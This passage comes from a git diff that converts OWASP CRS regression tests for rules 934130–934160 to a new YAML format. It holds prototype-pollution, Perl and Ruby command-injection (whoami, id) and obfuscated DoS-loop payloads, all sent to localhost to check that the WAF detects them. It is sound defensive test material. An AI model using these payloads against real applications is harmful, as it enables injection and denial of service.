+ method: GET + port: 80 + uri: "/get?foo=proto" + version: HTTP/1.0 + output: + log: + no_expect_ids: [934130] + - test_id: 2 desc: positive test case with JSON POST stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - {"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} - output: - log_contains: id "934130" - - test_title: 934130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + {"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} + output: + log: + expect_ids: [934130] + - test_id: 3 desc: positive test case, CVE-2021-20083 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__[test]=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__[test]=test" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 4 desc: positive test case, CVE-2021-20084, 1/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__.test=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__.test=test" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 5 desc: positive test case, CVE-2021-20084, 2/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?constructor.prototype.test=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?constructor.prototype.test=test" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 6 desc: positive test case with space evasion, CVE-2021-20084, 2/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?constructor.prototype.%20test=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?constructor.prototype.%20test=test" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 7 desc: positive test case with GET parameter, jQuery $.get stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__[context]=" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__[context]=" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 8 desc: positive test case with GET parameter, V4Fire Core Library stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__%5Btest%5D%3D%7B%22json%22%3A%22value%22%7D" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__%5Btest%5D%3D%7B%22json%22%3A%22value%22%7D" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 9 desc: positive test case with GET parameter, analytics-utils < 1.0.3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?constructor%5Bprototype%5D%5Btest%5D%3Dtest" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?constructor%5Bprototype%5D%5Btest%5D%3Dtest" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 10 desc: positive test case with GET parameter, jQuery $.get stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__[jquery]=x" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__[jquery]=x" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 11 desc: positive test case with GET parameter, Vue.js stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__%5Bv-bind%3Aclass%5D%3D%27%27.constructor.constructor%28%27alert%281%29%27%29%28%29" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__%5Bv-bind%3Aclass%5D%3D%27%27.constructor.constructor%28%27alert%281%29%27%29%28%29" + version: HTTP/1.0 + output: + log: + expect_ids: [934130] + - test_id: 12 desc: "Detect example payload __proto__... submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=__proto__.foo=bar - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934130" - - test_title: 934130-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=__proto__.foo=bar + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934130] + - test_id: 13 desc: "Detect example payload __proto__... submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=__\u0070\u0072oto__.foo=bar - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=__\u0070\u0072oto__.foo=bar + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934130] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml index f926730b5..080d6ab13 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml @@ -1,23 +1,21 @@ --- meta: author: "karelorigin, azurit" - enabled: true - name: "934140.yaml" - description: "Tests for rule 934140" +rule_id: 934140 tests: - - test_title: 934140-1 + - test_id: 1 desc: Perl interpolation attack stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?x=@{[system+whoami]}" - version: HTTP/1.0 - output: - log_contains: id "934140" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=@{[system+whoami]}" + version: HTTP/1.0 + output: + log: + expect_ids: [934140] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml index f52c43e6d..60ed9998e 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml @@ -1,23 +1,21 @@ --- meta: author: "karelorigin, azurit" - enabled: true - name: "934150.yaml" - description: "Tests for rule 934150" +rule_id: 934150 tests: - - test_title: 934150-1 + - test_id: 1 desc: Ruby injection test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?x=Process.spawn(%22id%22)" - version: HTTP/1.0 - output: - log_contains: id "934150" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=Process.spawn(%22id%22)" + version: HTTP/1.0 + output: + log: + expect_ids: [934150] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml index 0289e3b7c..aed2d48cb 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml @@ -1,535 +1,533 @@ --- meta: author: "karelorigin, azurit" - enabled: true - name: "934160.yaml" - description: "Tests for rule 934160" +rule_id: 934160 tests: - - test_title: 934160-1 + - test_id: 1 desc: Normal text false positive test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=while%20(foo)%20is%20bar." - version: HTTP/1.0 - output: - no_log_contains: id "934160" - - test_title: 934160-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=while%20(foo)%20is%20bar." + version: HTTP/1.0 + output: + log: + no_expect_ids: [934160] + - test_id: 2 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!false)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!false)" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 3 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!-0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!-0);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 4 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!%2B0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!%2B0);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 5 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!0);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 6 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!-0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!-0);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 7 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?eval=while(!"");' - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?eval=while(!"");' + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 8 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!'');" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!'');" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 9 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!``);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!``);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 10 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(true);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(true);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 11 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(Infinity);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(Infinity);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 12 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(-Infinity);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(-Infinity);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 13 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(%2BInfinity);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(%2BInfinity);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 14 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(-1);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(-1);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 15 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(%2B1);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(%2B1);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 16 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(new%20Date);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(new%20Date);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 17 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(this);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(this);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 18 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(String);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(String);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 19 desc: while truthy with negation (false positive) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!true);" - version: HTTP/1.0 - output: - no_log_contains: id "934160" - - test_title: 934160-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!true);" + version: HTTP/1.0 + output: + log: + no_expect_ids: [934160] + - test_id: 20 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!!{});" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!!{});" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 21 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!![]);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!![]);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 22 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?eval=while(!!"");' - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?eval=while(!!"");' + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 23 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!!'');" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!!'');" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 24 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!!``);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!!``);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 25 desc: while falsy with negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!null)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-26 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!null)" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 26 desc: while falsy with negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!undefined)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-27 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!undefined)" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 27 desc: while falsy with negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!NaN)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-28 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!NaN)" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 28 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while((true)))" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-29 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while((true)))" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 29 desc: "Detect example DoS loop while(true) submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=while(true);" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=while(true);" + version: HTTP/1.1 + output: + log: + expect_ids: [934160] + - test_id: 30 desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=\u0077\u0068ile(true);" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=\u0077\u0068ile(true);" + version: HTTP/1.1 + output: + log: + expect_ids: [934160] + - test_id: 31 desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" + version: HTTP/1.1 + output: + log: + expect_ids: [934160] + - test_id: 32 desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=XHUwMDc3XHUwMDY4aWxlKHRydWUpOwo%3D" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=XHUwMDc3XHUwMDY4aWxlKHRydWUpOwo%3D" + version: HTTP/1.1 + output: + log: + expect_ids: [934160] + - test_id: 33 desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=\u0064\u0032hpbGUodHJ1ZSk7Cg%3D%3D" - version: HTTP/1.1 - output: - log_contains: id "934160" + - input: + dest_addr: 127.0.0.1 + headers: + 